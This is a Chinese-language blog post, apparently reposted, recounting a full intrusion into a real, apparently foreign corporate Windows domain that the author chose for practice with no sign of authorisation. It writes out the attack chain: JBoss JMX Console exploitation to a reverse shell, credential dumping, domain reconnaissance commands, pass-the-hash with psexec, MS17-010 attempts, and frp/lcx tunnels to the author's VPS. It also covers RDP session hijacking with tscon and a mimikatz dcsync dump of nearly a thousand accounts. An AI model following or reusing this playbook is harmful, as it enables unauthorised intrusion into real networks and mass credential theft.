实战｜记一次完整的实战渗透经历

Delina

原文链接：实战｜记一次完整的实战渗透经历
​
前言

由于最近学习内网,打了一些靶场,觉得还是挺枯燥的,就想找一个真实的环境练练手,在hxd的指引下,找了个站去练练手。
web打点

上来就是一个jboss界面

​

随手一点,JMX Console竟然可以直接进。

​

这里最经典的玩法就是war包的远程部署
找到jboss.deployment

​

进入后找到void addURL()

​

这里网上有很多文章写这个玩法,这里就不复现了。
而前辈们早已写出了集成化工具,放到脚本工具上跑一下看看

​

脚本显示有两个漏洞,其中一个就是JMX Console,直接让脚本跑一下试试。
直接反弹了一个shell

​

由于这个shell比较脆弱,这里大致查查进程(无AV),看看管理员登录时间和网卡信息等等。

​

​

​

​

可以看到是有域的

​

大致了解了情况后就想直接走后渗透,ping下度娘看下机器出不出网。

​

是出网的,由于是国外的机器ping就比较高,由于无杀软,所以准备直接powershell上线

​

因为后来发现域很大,派生了一个会话来操作。
​​
后渗透本机信息收集

权限很高,上来先把hash抓到,心安一点。

​

​

一开始没注意仔细看,这里已经发现当前主机所在的域名

​

由于是在域中,通过dns大致定位域控ip

​

不急着打域控,先做一波信息收集
域内信息收集

查询域数量

​

查询域内计算机列表

​

查询域管账户net group "domain admins" /domain

​

查询域控账户shell net group "domain controllers" /domain

​

这里04和53的后缀和刚刚DNS的后缀是一样的,确认域控机器和账户
查询域内用户shell net user /domain

​

这一个域大概是三四百个用户账号,还是比较大的
查询域所用主机名shell net group "domain computers" /domain

​

主机也有一百多台
shell net accounts /domain查看域账户属性,没有要求强制更改密码

​

shell nltest /domain_trusts域信任信息

​

shell net group /domain查看域中组信息

​

net use查看是否有ipc连接,net share查看共享

​

但是这里net session有几台,这是其他主机连接本机的ipc连接

​

spn扫描

机器在域内了,spn是不得不看一下的,比起端口扫描更精确,也更加隐蔽,这是由于SPN扫描通过域控制器的LDAP进行服务查询,而这正是Kerberos票据行为的一部分。windows自带了一款工具:setspn shell setspn -T xxxx -Q */*
这里就可以看到28机器有MSSQL服务,开启1433端口

​

这里服务确实有点太多了,为了方便就将结果输出到文本

​

将主机名列出 grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

​

横向移动

上来先试试pth域控,无果,又尝试扫描MS17010,也没有洞,只能去先横向其他的主机。通过上面net session,发现一个与当前主机用户名相同的账户名称,尝试psexec传递hash 拿下该主机

​

这个session有一个作用就是盗取令牌,创建更高权限账户的进程,比如域管的cmd这种,但是这里我对比了net session的用户名和域管用户的用户名,发现没有一个是相同的,这个方法也就不去尝试了。
​​
批量扫一波MS17010,这个域的防御性比较高,只有零星几台有漏洞。

​

​

​

并且同网段没有,只有0,2,3段各一台,这里就像先把他们都先拿下,看OS版本应该是没问题的,准备派生会话给msf去打。但天色一晚,歇息了,歇息了。
第二日，探测到内网三台主机有ms17010的漏洞,准备深挖一波。
MS17010
cs上还是不太好打,派生个会话给msf。我的vps是windows server的,一开始下了个windows版的msf在vps上,但是添加路由的时候一直说我参数不对,就不知道咋回事。

​

还是算了,就搞个代理到本机用虚拟机kali吧。我用的是frp,vps当server,虚拟机当client
vps配置frps.ini 配一个端口

​

kali配置frpc.ini

​

然后vps上命令行启动frps.exe frps.exe -c frps.ini
​
kali执行 frpc.exe -c frpc.ini

​

这样就可以愉快的派生会话了,但是这里最后打的时候三台主机没一台能打下来。首先三台主机都没有开启管道,只能用eterblue模块,最后也没成功,这个域系统安全性还是比较高的。
pth
没办法,系统漏洞一台拿不了,但是通过端口扫描发现大量主机开启445端口,于是还是先pass the hash
批量撞一波

​

​

断断续续拿下不少主机

​

这时就一台一台的信息收集
rdp劫持会话
在27这台主机上发现,有两个会话,上面是我们已知账号和明文密码的普通域内账户,而下面这个用户经过比对,为域中域管用户。

​

由于我们自身权限也高,这里就想rdp上去劫持该会话(当时打的时候比较激动,没注意看这个会话是失效的,这里还是记录一下) 看眼时间,应该在休息呢

​

lcx设置代理 目标机器上 shell C:\Windows\system32\lcx.exe -slave 公网ip 7212 127.0.0.1 3389 vps上 lcx -listen 7212 5555

​

​

​

在cs上执行shell tscon 2 他说没有权限。

​

在目标机器执行的时候提示错误的密码,猜想大概是会话断联的原因。如果STATE是active应该是没问题的。
拿下DC​​
将所有拿下的主机的hash全部dump出来,整合后发现有Administrator的账户hash,且是域中账户,而在域中Administrator是作为域管账户的。445端口开启

​

尝试pth

​

​

失败了,如果不能pth这个hash将索然无味,又不能拿到明文 这里搞了很久,然后又回去信息收集。搞来搞去搞了很久,还是那么7、8台主机,最后也是没办法,由于抓到了很多密码,把所有Administrator用户的hash全部pass了一遍,终于拿下了域控

​

导出ntds,抓下密码,这里使用mimikatz lsadump::dcsync /domain:xxx /all /csv command

​

​

将近一千个用户,RDP他们好像随时都是连着的。

​

想3389上去看一下,找一个没有连接的用户
​
找到该用户的hash拿去解密

​

成功连接

​

收工,准备吃晚饭了
​